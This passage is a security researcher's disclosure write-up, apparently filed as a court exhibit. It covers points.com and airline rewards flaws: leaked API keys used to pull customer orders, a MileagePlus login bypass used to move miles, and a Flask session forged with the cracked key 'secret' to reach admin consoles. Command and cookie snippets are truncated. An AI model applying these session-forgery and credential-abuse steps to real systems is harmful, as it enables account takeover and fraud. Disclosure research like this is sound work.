12/20/23, 10:59 AM    Hacking Reward Points — Unlimited Miles and Status for Everyone | by Sam Curry et al. | December, 2023 | Medium

Case 1:23-cv-01177-GBW  Document 20-1  Filed 12/21/23  Page 60 of 75 PageID #: 781



This website was interesting to us, because it was hosted by points.com and likely leveraged credentials by either points.com or Virgin to access information related to their program.

We ran discovery tools on the asset and found various PHP endpoints, including a "login1.php" endpoint which returned the following information:



Within the HTTP response of the "login1.php" endpoint were what appeared to be a testing rewards member's profile information alongside various keys.

The keys disclosed included the customer's authorization token, but much more interestingly, the "macID" and "macKey" values for what we assumed were for Virgin's points.com production tenant account!

Based on our understanding of the "lcp.points.com" API, we could use those secrets to access the API on behalf of the airline. We sought out a way to validate this. After scouring the internet for a while, we discovered the following code

12/20/23, 10:59 AM    Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

Case 1:23-cv-01177-GBW    Document 30-1    Filed 12/21/23    Page 61 of 75    PageID #: 782

which could be used to sign HTTP requests to the "lcp.points.com" API using the leaked credentials:

```
if __name__ == '__main__':
    if '-u' not in sys.argv:
        exit("Usage: %s -u <macKeyIdentifier>:<macKey> [curl opti
```

Using code from the above Github repository built to help sign HTTP requests to "lcp.points.com", we could use the following syntax to send Virgin signed HTTP requests to the "lcp.points.com" API:

```
python lcp_curl.py -u MAC_ID:MAC_SECRET "https://lcp.points.com/v
```

After running the above script to sign an HTTP request on behalf of the Virgin program to "/v1/search/orders" endpoint, we received the following data back:

```
{
  "orders": [
    {
      "payment": {
      "billingInfo": {
      "cardName": "Visa",
      "cardNumber": "XXXXXXXXXXXXXXXX",
      "cardType": "VISA",
      "city": "REDACTED",
      "country": "US",
      "expirationMonth": 4,
      "expirationYear": 2023,
      "firstName": "REDACTED",
      "lastName": "REDACTED",
      "phone": "REDACTED",
      "state": "CA",
      "street1": "REDACTED",
      "zip": "REDACTED"
```

```
        }
    ...
    ],
    "totalCount": "2032431"
}
```

It worked!

This validated that the leaked credentials were valid and could be used to access the Virgin rewards program. An attacker could hit any of the "lcp.points.com" endpoints using these credentials, including administrative ones like adding/removing rewards points from customers, accessing customer accounts, and modifying tenant information related to the Virgin rewards program.

We reported the issue and the endpoint was removed within an hour.

# (4) Authorization Bypass on "widgets.unitedmileageplus.com" allows Attacker to Authenticate as Any User via Last Name and Rewards Number, Potential Access to United MileagePlus Administration Panel

On the United bug bounty program, there are a few domains that are explicitly out of scope including "mileageplus.com". Our guess why they're out of scope is that many of the "mileageplus.com" subdomains are actually powered by points.com.

One of the subdomains of this site is "widgets.unitedmileageplus.com" which acts as a sort of SSO service for United MileagePlus members to authenticate into apps like "buymiles.mileageplus.com" and "mpxadmin.unitedmileageplus.com".

12/20/23, 10:53 PM    Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

Case 1:23-cv-01177-GBW    Document 20-1    Filed 12/21/23    Page 63 of 75 PageID #: 784



After enumerating the subdomain with gau, we identified that there were various login pages that would authenticate you into related MileagePlus apps.

Each of these login pages expected different arguments: some would ask you for a United MileagePlus number and password, while others would ask you for a username, password, and an answer to your security questions. There was one very odd form, where it only asked you for your MileagePlus number and last name.

## Connect to Reinstate Challenge

### MileagePlus Number:

### Last Name

We found that the token returned from each of the different authorization methods were identical in format to each other. We tested and found that it was possible to copy the token from the HTTP response where you authenticated using only your surname and MileagePlus number into the consumer endpoints from the more secure username, password, and security question endpoints and you would be authenticated into any of the applications!

This meant that there was an authorization bypass where we could skip logging into the account with the member credentials and instead only provide their name and MileagePlus number.

From an impact perspective, there were various apps that were accessible via this bypass including the "buymiles.mileageplus.com" which disclosed PII and allowed us to transfer miles to ourselves. We went ahead and used this exploit to transfer miles from one of our own accounts to another, demonstrating that it was indeed possible to transfer another user's miles using this authorization bypass.



The other much more interesting app that we could've (potentially) authenticated to was the "mpxadmin.unitedmileageplus.com" website. We were unable to confirm this because at the time of discovering the issue we didn't have the surname and a MileagePlus number of a United employee who may have had access to the app. If we did, we assume that it would've been possible and this level of access would allow us to manage the balances of customers, view transactions, and perform administrative actions for the MileagePlus rewards program.

Case 1:23-cv-01177-GBW   Document 20-1   Filed 12/21/23   Page 65 of 75   PageID #: 786



Since we couldn't confirm this, the hunt continued!

## Looking for something more critical...

The holy grail for us would be the ability to generate unlimited miles. We'd never be able to actually exploit it (ethically), but just the idea of finding a way to travel the world with free first class flights, five star hotels, cruises, and meals kept us going...



(what our fantasy world looked like, given that we could discover a vulnerability to generate unlimited rewards points)

## Switching Back to Hunting on the Points.com Global Administration Console

After realizing that we couldn't go much further impact wise hunting on the airline websites, we switched our focus back to the original website we found that was used by points.com employees and rewards program owners to administratively manage their customers and rewards programs.

From what we saw in the JavaScript on the "console.points.com" website, there were tons of endpoints that were only accessible to points.com employees. We tested these endpoints for a few more hours, trying and failing to find any sort of authorization bypass or way around the permission checks. After a little while longer of frustrated attempts to escalate our privileges, we zoomed out and realized something obvious that we had been overlooking the entire time…

## (5) Full Access to Core Points.com Administration Console and Loyalty Admin Website via Weak Flask Session Secret

After we finally stopped testing the APIs and looking for permission vulnerabilities, we realized that we'd totally forgotten to look at the session cookies!

Based on the format of the cookie, we could tell that it was some weird encrypted blob because on the JWT-looking format of it. It took us a little more poking but we eventually realized that the core app session token was a signed Flask session cookie.



```
session=.eJwNyTEOgzAMBdC7eO6QGNskXCZKrG8hgVqJdEPcvX3ru6n5vKJ9Pwfe
```

We took the cookie and ran it through Ian Carroll's "cookiemonster" tool. This tool would automatically guess secrets used for signing the cookie by attempting

to unsign it with a wordlist of known secrets. After a few seconds, we had a response!

```
zlz@htp ~> cookiemonster -cookie ".eJwNyTEOgzAMBdC7eO6QGNskXCZKrG
🍪 CookieMonster 1.4.0
ℹ️  CookieMonster loaded the default wordlist; it has 38919 entri
✅ Success! I discovered the key for this cookie with the flask d
```

The Flask session secret for the website that was used by points.com employees to manage all rewards profiles, loyalty programs, and customer orders, was the word "secret". We could now theoretically sign our own cookie with whatever data we wanted, as long as the server wasn't including some unpredictable or signed piece of data within the cookie. We authenticated to the website and copied our session cookie over to flask-unsign to investigate the contents of the cookie:

```
{'_csrf_token': 'redacted', '_fresh': True, '_id': 'redacted', '_
```

Based on what we saw in the decrypted body of our cookie, there wasn't anything unpredictable that would stop us from tampering with the cookie. The "roles" and "groups" arrays appeared most fruitful for escalating privileges since we could now re-sign it with any data we wanted, so we went back through the app and attempted to find JavaScript which related to these fields.

The role which looked the most privileged based on the information we found in the JavaScript was the "configeditor" role. We added this to our cookie along with the "admin" group and resigned it using the following command:

```
flask-unsign -s -S "secret" -c "{'_csrf_token': 'bb2cf0e85b20f13d
```

Case 1:23-cv-01177-GBW   Document 30-1   Filed 12/21/23   Page 68 of 75 PageID #: 789

The command resigned our cookie with the "secret" key and gave us the following cookie:



```
session=.eJy9U01r3DAU_C8-x1lJ1oe9UOgSegiUsrQhCZRg9PG0665tOZKcdgn5
```

After plugging this cookie in, we attempted to revisit the "console.points.com" website and saw a bunch of extra functionality. We were in and had full administrative privileges!

One page that immediately grabbed our attention was "Manual Bonus". After clicking it, we realized that it was capable of manually adding rewards points for any program to any rewards account. Jackpot!



We could additionally access the "admin-loyaltywallet.points.com" website after clicking the "Loyalty Platform" sidebar button. This website had additional functionality, allowing us to query users via their name, member ID, or email address, and much much more:

12/20/23, 10:39 AM    Leaked Documents Claimed Mirrored During Largest Hotel Rewards Platform...

Case 1:23-cv-01177-GBW  Document 30-1  Filed 12/21/23  Page 69 of 75  PageID #: 790



Other tabs included config and experiment management:



Another fun bit of impact was the ability to modify the rewards exchange amounts through the Promos tab. We could update rewards programs to offer, for example, 100 million United miles in exchange for 1 Delta mile, or simply 1 million miles for every dollar spent on a particular program. Users would then be able to exchange their miles, giving them nearly unlimited miles.



For user management, you could view, update, or delete user accounts. It was possible to see all account history, connections, and memberships for the accounts.



Two other interesting pages on the "console.points.com" website were the Modules and Routes endpoints. An attacker could use this as intended to add malicious JavaScript to every page on the administration panel. If undetected, it would make for a super fun backdoor where an attacker's JavaScript would be loaded on every page of the administration website.



Since these were all production rewards customers, an attacker could temporarily shut down all rewards travel by modifying the key pairs used by each airline on the Platform Partners endpoint. Once the MAC ID and MAC key were overwritten, it would break the infrastructure used by airlines to communicate with points.com, meaning customers would be unable to book flights using airline miles.



Something important to note is that this administration panel was built for points.com employees to manage rewards programs at the tenant level. An attacker with this level of access could revoke the credentials used by the actual airline to provide service to their customers to access the API, thereby shutting down global rewards travel for that specific airline. In addition to accessing

12/20/23, 1:09 PM Hacking Points: How We Earned a Lifetime of Free Travel by Hacking All Major Airline, Hotel, and Travel Rewards Platforms

Case 1:23-cv-01177-GBW Document 20-1 Filed 12/21/23 Page 72 of 75 PageID #: 793

customer account information. There are many interesting scenarios in which a malicious attacker could've abused this access.

We reported the vulnerability and the points.com team responded almost immediately, even though our email was sent at 3:26 AM CST (sorry for hacking so late, both Ian and I were restless on a plane when we found this vulnerability!). The team understood the severity of the report and immediately took down the "console.points.com" website.

We attempted to bypass their fix via vhost hopping from the origin server IP with no luck. The site was completely taken down and the issue would be fixed shortly after.

# Closing

After submitting our last report to the points.com team, the overall findings had allowed us to access to customer information for a huge percentage of global rewards programs, transfer points on behalf of customers, and finally access the global administration panel. We had reported all issues to the points.com security team who very quickly patched them and worked with us in creating this disclosure.

This blog post, along with our other research (taking over a dozen TLDs; being able to remotely unlock, locate, and sometimes disable over a dozen different auto manufacturers vehicles) follows the theme of high impact vulnerability research where an attacker can compromise a single point of failure with widespread impact.

Thank you for reading! 😛

# Disclosure Timeline

- March 8, 2023 - Reported Miles Theft and PII Disclosure Vulnerability (#1)
- March 8, 2023 - Response from points.com acknowledging the issue

- March 9, 2023 - Sent additional information on how to escalate March 8th finding (#2)
- March 9, 2023 - Response from points.com, site taken offline
- March 29, 2023 - Received email from points.com about regarding a comprehensive fix
- March 29, 2023 - Sent response validating the comprehensive fix
- April 29, 2023 - Reported United Authorization Bypass (#3)
- April 29, 2023 -  Response from points.com, site taken offline
- May 2, 2023 - Sent report for leaked Virgin credentials (#4)
- May 2, 2023 - Response from points.com, endpoint removed
- May 2, 2023 - Sent report for Weak Flask Session Cookie (#5)
- May 2, 2023 - Response from points.com, site taken offline
- August 3, 2023 - Disclosure

# Special thanks to...

- Nick Wright for the amazing cover image (https://instagram.com/nick99w)
- Daniel Ritter (https://twitter.com/_danritter)
- Brett Buerhaus (https://twitter.com/bbuerhaus)
- Samuel Erb (https://twitter.com/erbbysam)
- Joseph Thacker (https://twitter.com/rez0__)
- Gal Nagli (https://twitter.com/naglinagli)
- Noah Pearson

← Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

Search ...

## Recent Posts

Leaked Secrets and
Unlimited Miles:
Hacking the Largest
Airline and Hotel
Rewards Platform

Web Hackers vs. The
Auto Industry: Critical
Vulnerabilities in
Ferrari, BMW, Rolls
Royce, Porsche, and
More

Exploiting Web3's
Hidden Attack
Surface: Universal XSS
on Netlify's Next.js
Library

## Archives

August 2023

January 2023

September 2022

December 2020

October 2020

June 2020

May 2020

April 2020

November 2019

September 2019

July 2019

December 2018

July 2018

May 2018

November 2017

August 2017

June 2017

May 2017